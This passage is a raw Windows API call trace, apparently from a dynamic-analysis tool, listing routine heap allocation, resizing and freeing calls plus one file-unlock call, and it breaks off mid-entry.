RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x3929b90 [0162.790] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b90) returned 0x13 [0162.790] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x392a400 [0162.790] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a400) returned 0x80 [0162.790] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x3929c60 [0162.790] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x13 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x19) returned 0x394a060 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a060) returned 0x19 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x17) returned 0x3929c80 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c80) returned 0x17 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x19) returned 0x394a088 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a088) returned 0x19 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x14) returned 0x3929ca0 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca0) returned 0x14 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x17) returned 0x3929cc0 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929cc0) returned 0x17 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x15) returned 0x3929ce0 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ce0) returned 0x15 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x12) returned 0x3929d00 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d00) returned 0x12 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a400) returned 0x80 [0162.791] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x392a400, Size=0x100) returned 0x3929d20 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d20) returned 0x100 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x15) returned 0x392a400 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a400) returned 0x15 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0b0 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xf) returned 0x392a8d0 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8d0) returned 0xf [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x16) returned 0x392a420 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a420) returned 0x16 [0162.791] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x18) returned 0x392a440 [0162.791] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a440) returned 0x18 [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x392a460 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a460) returned 0x13 [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xf) returned 0x392a8e8 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8e8) returned 0xf [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x14) returned 0x3929e28 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e28) returned 0x14 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d20) returned 0x100 [0162.792] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x3929d20, Size=0x180) returned 0x3929e48 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e48) returned 0x180 [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x15) returned 0x3929d20 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d20) returned 0x15 [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x11) returned 0x3929d40 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d40) returned 0x11 [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x17) returned 0x3929d60 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d60) returned 0x17 [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x18) returned 0x3929d80 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d80) returned 0x18 [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x21) returned 0x3929da0 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929da0) returned 0x21 [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3b) returned 0x3929dd0 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929dd0) returned 0x3b [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0d8 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1c [0162.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x41) returned 0x3929fd0 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fd0) returned 0x41 [0162.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1c [0162.792] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x394a0d8, Size=0x34) returned 0x392af80 [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0162.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3f) returned 0x394a860 [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3f [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0162.793] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x392af80, Size=0x64) returned 0x395b8c8 [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0162.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x41) returned 0x392a020 [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a020) returned 0x41 [0162.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3d) returned 0x394a8a8 [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a8a8) returned 0x3d [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0162.793] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x395b8c8, Size=0xc4) returned 0x394b848 [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0xc4 [0162.793] _aulldvrm () returned 0x0 [0162.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1a) returned 0x394a0d8 [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1a [0162.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x92) returned 0x394b918 [0162.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b918) returned 0x92 [0162.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a900 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a900) returned 0x10 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929dd0) returned 0x3b [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929dd0 | out: hHeap=0x2dc0000) returned 1 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fd0) returned 0x41 [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fd0 | out: hHeap=0x2dc0000) returned 1 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3f [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a860 | out: hHeap=0x2dc0000) returned 1 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a020) returned 0x41 [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a020 | out: hHeap=0x2dc0000) returned 1 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a8a8) returned 0x3d [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a8a8 | out: hHeap=0x2dc0000) returned 1 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0xc4 [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1a [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0d8 | out: hHeap=0x2dc0000) returned 1 [0162.794] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a918 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a918) returned 0x10 [0162.794] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929fd0 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fd0) returned 0xe0 [0162.794] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x394b9b8 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9b8) returned 0x3fc [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9b8) returned 0x3fc [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9b8) returned 0x3fc [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b9b8 | out: hHeap=0x2dc0000) returned 1 [0162.794] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fd0) returned 0xe0 [0162.794] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fd0 | out: hHeap=0x2dc0000) returned 1 [0162.794] _aulldvrm () returned 0x0 [0162.795] _aulldvrm () returned 0x0 [0162.795] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3d) returned 0x394a8a8 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a8a8) returned 0x3d [0162.795] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0d8 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1c [0162.795] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x58) returned 0x394b848 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x58 [0162.795] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x7) returned 0x392a480 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a480) returned 0x7 [0162.795] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a930 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a930) returned 0xe [0162.795] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x66) returned 0x395b8c8 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x66 [0162.795] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a948 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a948) returned 0x10 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a8a8) returned 0x3d [0162.795] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a8a8 | out: hHeap=0x2dc0000) returned 1 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1c [0162.795] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0d8 | out: hHeap=0x2dc0000) returned 1 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a480) returned 0x7 [0162.795] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a480 | out: hHeap=0x2dc0000) returned 1 [0162.795] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x58 [0162.795] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a930) returned 0xe [0162.796] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a930 | out: hHeap=0x2dc0000) returned 1 [0162.796] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929fd0 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fd0) returned 0xe0 [0162.796] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x394b9b8 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9b8) returned 0x3fc [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9b8) returned 0x3fc [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9b8) returned 0x3fc [0162.796] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b9b8 | out: hHeap=0x2dc0000) returned 1 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fd0) returned 0xe0 [0162.796] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fd0 | out: hHeap=0x2dc0000) returned 1 [0162.796] _aulldvrm () returned 0x0 [0162.796] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6) returned 0x392a480 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a480) returned 0x6 [0162.796] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x3929dd0 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929dd0) returned 0x50 [0162.796] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x16) returned 0x394b9d0 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9d0) returned 0x16 [0162.796] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x394b848 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x80 [0162.796] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x17) returned 0x394b9f0 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9f0) returned 0x17 [0162.796] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x18) returned 0x394ba10 [0162.796] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba10) returned 0x18 [0162.797] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x14) returned 0x394ba30 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba30) returned 0x14 [0162.797] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3e) returned 0x394a8a8 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a8a8) returned 0x3e [0162.797] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0d8 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1c [0162.797] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3f) returned 0x394a860 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3f [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1c [0162.797] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x394a0d8, Size=0x34) returned 0x392af80 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0162.797] _aulldvrm () returned 0x0 [0162.797] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x19) returned 0x394a0d8 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x19 [0162.797] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x81) returned 0x3929fd0 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fd0) returned 0x81 [0162.797] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a930 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a930) returned 0x10 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a8a8) returned 0x3e [0162.797] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a8a8 | out: hHeap=0x2dc0000) returned 1 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3f [0162.797] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a860 | out: hHeap=0x2dc0000) returned 1 [0162.797] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0162.797] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af80 | out: hHeap=0x2dc0000) returned 1 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x19 [0162.798] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0d8 | out: hHeap=0x2dc0000) returned 1 [0162.798] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a960 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a960) returned 0x10 [0162.798] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x394c1b8 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0xe0 [0162.798] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x394c2a0 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c2a0) returned 0x3fc [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c2a0) returned 0x3fc [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c2a0) returned 0x3fc [0162.798] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c2a0 | out: hHeap=0x2dc0000) returned 1 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0xe0 [0162.798] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c1b8 | out: hHeap=0x2dc0000) returned 1 [0162.798] _aulldvrm () returned 0x0 [0162.798] _aulldvrm () returned 0x0 [0162.798] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3e) returned 0x394a860 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3e [0162.798] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0d8 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1c [0162.798] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x58) returned 0x392a060 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a060) returned 0x58 [0162.798] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6) returned 0x3929bb0 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bb0) returned 0x6 [0162.798] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a978 [0162.798] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a978) returned 0xd [0162.799] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x65) returned 0x395b938 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b938) returned 0x65 [0162.799] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a990 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a990) returned 0x10 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3e [0162.799] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a860 | out: hHeap=0x2dc0000) returned 1 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0d8) returned 0x1c [0162.799] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0d8 | out: hHeap=0x2dc0000) returned 1 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bb0) returned 0x6 [0162.799] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929bb0 | out: hHeap=0x2dc0000) returned 1 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a060) returned 0x58 [0162.799] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a060 | out: hHeap=0x2dc0000) returned 1 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a978) returned 0xd [0162.799] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a978 | out: hHeap=0x2dc0000) returned 1 [0162.799] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x394c1b8 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0xe0 [0162.799] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x394c2a0 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c2a0) returned 0x3fc [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c2a0) returned 0x3fc [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c2a0) returned 0x3fc [0162.799] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c2a0 | out: hHeap=0x2dc0000) returned 1 [0162.799] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0xe0 [0162.799] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c1b8 | out: hHeap=0x2dc0000) returned 1 [0162.799] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de498 | out: lpOverlapped=0x2de498) returned 1 [0162.799] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x394ba50 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba50) returned 0x13 [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x392a060 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a060) returned 0x50 [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a978 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a978) returned 0xa [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x394c1b8 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x80 [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a9a8 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9a8) returned 0xa [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a9c0 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9c0) returned 0xe [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a9d8 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9d8) returned 0xd [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a9f0 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9f0) returned 0x9 [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392aa08 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392aa08) returned 0x10 [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x394c240 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c240) returned 0xe0 [0162.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x394c328 [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c328) returned 0x3fc [0162.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c328) 